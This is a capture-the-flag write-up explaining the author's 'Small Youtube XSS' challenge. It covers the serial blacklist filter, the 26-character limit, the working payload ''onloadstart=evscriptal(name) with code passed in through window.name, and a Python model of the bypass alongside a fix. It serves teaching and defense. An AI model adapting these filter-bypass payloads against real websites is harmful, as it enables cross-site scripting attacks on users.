Back on June 10, 2016, I published an XSS challenge on the hack.me platform that I called Small Youtube XSS. If you are here just for the solution and not interested in the write-up, here’s a link: Here.

Keep reading for the rules and hints.

Description

In this XSS challenge, you need to use many tricks to create a working vector. It is not that hard, but not so easy either.

Rules

  • No user interaction allowed.
  • Use only modern browsers (IE11, FF49, etc.).
  • We need to see an alert box with the domain name.

Hints

  • Use (?xss=) as the injection parameter.
  • Try to find missing or weak “things” in the HTTP headers and the HTML source.
  • Have you ever been told that you are too short to join the basketball team? Now you are too long to XSS this.
  • Watch the video for motivation: “https://www.youtube.com/watch?v=hzBCI13rJmA”.
    If you solve it, please contact me (a.hussam[at]isecur1ty.org), and enjoy!

The challenge has been running for months now, and there are only 2 solvers so far, although it has been started over 1100 times. So here is the solution.

Solution

I deleted the source code a long time ago, so I’ll try to guess or remember what I wrote. I built this challenge around a multi-step filter that runs its replacements in series:

  • First, it replaces words like eval, setInterval, and setTimeout with (xss-event).
  • Second, it removes the word script (the key to the solution).
  • Third, it replaces event handler attributes with (xss-event), except two of them.
  • htmlentities is applied to the xss parameter, so less-than, greater-than, and double quotation marks are useless.
<video width="450" height="400" controls name=injection_here>
    <source src="http://www.google.com/test.mp4" type="video/mp4">
    Your browser does not support the video tag.
</video>

Our injection point is inside the video tag. Here is the list of event handlers for video tags: HTML5 Video Events and API.
You will find that all of them are filtered except two: onloadstart and onratechange. onratechange requires user interaction, so we exclude it.


The word domain is filtered, so we will have to use the script-removal trick.

Another problem: the payload can be at most 26 characters.

<?php
  // only the first 26 characters of the parameter survive
  $_GET['xss'] = substr( $_GET['xss'], 0, 26) ;
?>

Plot twist

https://en.wikipedia.org/wiki/Plot_twist

We need another way to alert document.domain, since the regular payload is too long. We can use eval(): eval will run our string as JS code. But where can we put that string? We can pass it in through window.name.

eval is filtered, but we can use the script trick again, so it becomes evscriptal(name). All in one:

<a href="http://s25504-102604-rmx.tarentum.hack.me/myvideo.php?xss=''onloadstart=evscriptal(name)" target="javascript:alert(domain);">click me</a>

And here we are: the alert box shows the domain name.

There are multiple ways to give a name to a window, like window.open or the name attribute of an iframe. I allowed the page to be framed, but I added frame busting to the page, which can be bypassed easily.
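To make the filter weakness concrete, here is an added Python model of the serial blacklist described above and of the fix; it is not the challenge's PHP (which the author no longer has), so the step order, the handler regex, truncation running last, and the hardened renderer are all assumptions. It shows why removing the word script after replacing eval re-creates eval, why the unquoted name attribute lets a second attribute appear, and how context-aware encoding into a quoted attribute closes both holes without any blacklist.

```python
import html
import re
from html.parser import HTMLParser

# Assumed reconstruction of the challenge's serial blacklist (the original
# PHP is gone); step order follows the write-up, truncation assumed last.
JS_SINKS = ("eval", "setInterval", "setTimeout")
ALLOWED_HANDLERS = {"onloadstart", "onratechange"}   # the two left unfiltered
MAX_LEN = 26

def serial_filter(value: str) -> str:
    """Each step runs once, in order; no step re-checks what an earlier one did."""
    for word in JS_SINKS:                        # step 1: dangerous functions
        value = value.replace(word, "xss-event")
    value = value.replace("script", "")          # step 2: drop the word script
    def handler(m):                              # step 3: event handlers
        return m.group(0) if m.group(0) in ALLOWED_HANDLERS else "xss-event"
    value = re.sub(r"\bon[a-z]+", handler, value)
    value = html.escape(value, quote=False).replace('"', "&quot;")  # step 4: htmlentities
    return value[:MAX_LEN]                       # substr($_GET['xss'], 0, 26)

def render_unquoted(value: str) -> str:
    """Challenge template (as on the page): the value lands in an UNQUOTED attribute."""
    return f'<video width="450" height="400" controls name={serial_filter(value)}>'

def render_hardened(value: str) -> str:
    """Fix (assumed): encode for the context, i.e. a quoted attribute with ENT_QUOTES-style escaping."""
    return f'<video width="450" height="400" controls name="{html.escape(value, quote=True)}">'

class _VideoAttrs(HTMLParser):
    """Collects the attributes a browser-like parser sees on the <video> tag."""
    def __init__(self):
        super().__init__()
        self.attrs = {}
    def handle_starttag(self, tag, attrs):
        if tag == "video":
            self.attrs = dict(attrs)

def parsed_attrs(markup: str) -> dict:
    p = _VideoAttrs()
    p.feed(markup)
    return p.attrs

if __name__ == "__main__":
    payload = "''onloadstart=evscriptal(name)"    # the write-up's own payload
    print(serial_filter(payload))                  # step 2 turns evscriptal back into eval
    print(parsed_attrs(render_unquoted(payload)))  # a new onloadstart attribute appears
    print(parsed_attrs(render_hardened(payload)))  # name stays a single harmless attribute
```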

Solvers

  • Adam Simuntis (adam.simuntis[at]secforce.com), with a nice and expected solution.
  • Lucas Philippe (a bug in my code, which is fixed).

I hope you enjoyed the write-up and the challenge, see you soon with another one.

For questions or inquiries, contact me on my Twitter account @Abdulahhusam.